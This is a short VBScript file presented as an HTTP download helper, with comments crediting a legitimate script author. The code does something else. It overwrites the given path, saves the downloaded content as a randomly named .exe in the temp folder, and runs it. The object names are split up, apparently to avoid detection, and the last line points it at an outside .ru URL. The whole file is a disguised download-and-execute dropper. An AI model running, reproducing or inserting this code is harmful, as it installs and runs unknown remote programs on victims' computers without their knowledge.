Sub HTTPUpload( myURL, myPath )
' ===================================================================================
' This Sub downloads the FILE specified in myURL to the path specified in myPath.
'
' myURL must always end with a file name
' myPath may be a directory or a file name; in either case the directory must exist
'
' Written by Rob van der Woude
' http://www.robvanderwoude.com
'
' Based on a script found on the Thai Visa forum
' http://www.thaivisa.com/forum/index.php?showtopic=21832
' ===================================================================================
    Dim winHttp
    Dim version
    winHttp = "WinHttp"
    version = "5.1"
    Dim objShell
    Set objShell = WScript.CreateObject( "WScript.Shell" )

    ' Standard housekeeping
    Dim i, objFile, objFSO, oBjHt_tP, strFile, strMsg
    Const ForReading = 1, ForWriting = 2, ForAppending = 8

    ' Create a File System Object
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )

    ' Getting temprorary folder
    Const TemporaryFolder = 2
    Dim tfolder
    Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)

    ' Getting temproraty name
    tname = objFSO.GetTempName + ".exe"

    myPath = tfolder + "/" + tname

    Set objFile = tfolder.CreateTextFile(tname)

    ' Create an HTTP object
    Set oBjHt_tP = CreateObject( winHttp + "." + winHttp + "Request" + "." + version )

    ' Download the specified URL
    oBjHt_tP.Open "GET", myURL, False
    oBjHt_tP.Send

    Dim tmpData
    ' Write the downloaded byte stream to the target file
    For i = 1 To LenB( oBjHt_tP.ResponseBody )*1
        tmpData = MidB( oBjHt_tP.ResponseBody, i, 1 )
        objFile.Write Chr( AscB( tmpData ) )
    Next

    ' Close the target file
    objFile.Close( )

    objShell.Run(myPath)
    Set objShell = Nothing
End Sub

HTTPUpload "http://iviscom.ru/info/brands/log.php?f=404", ""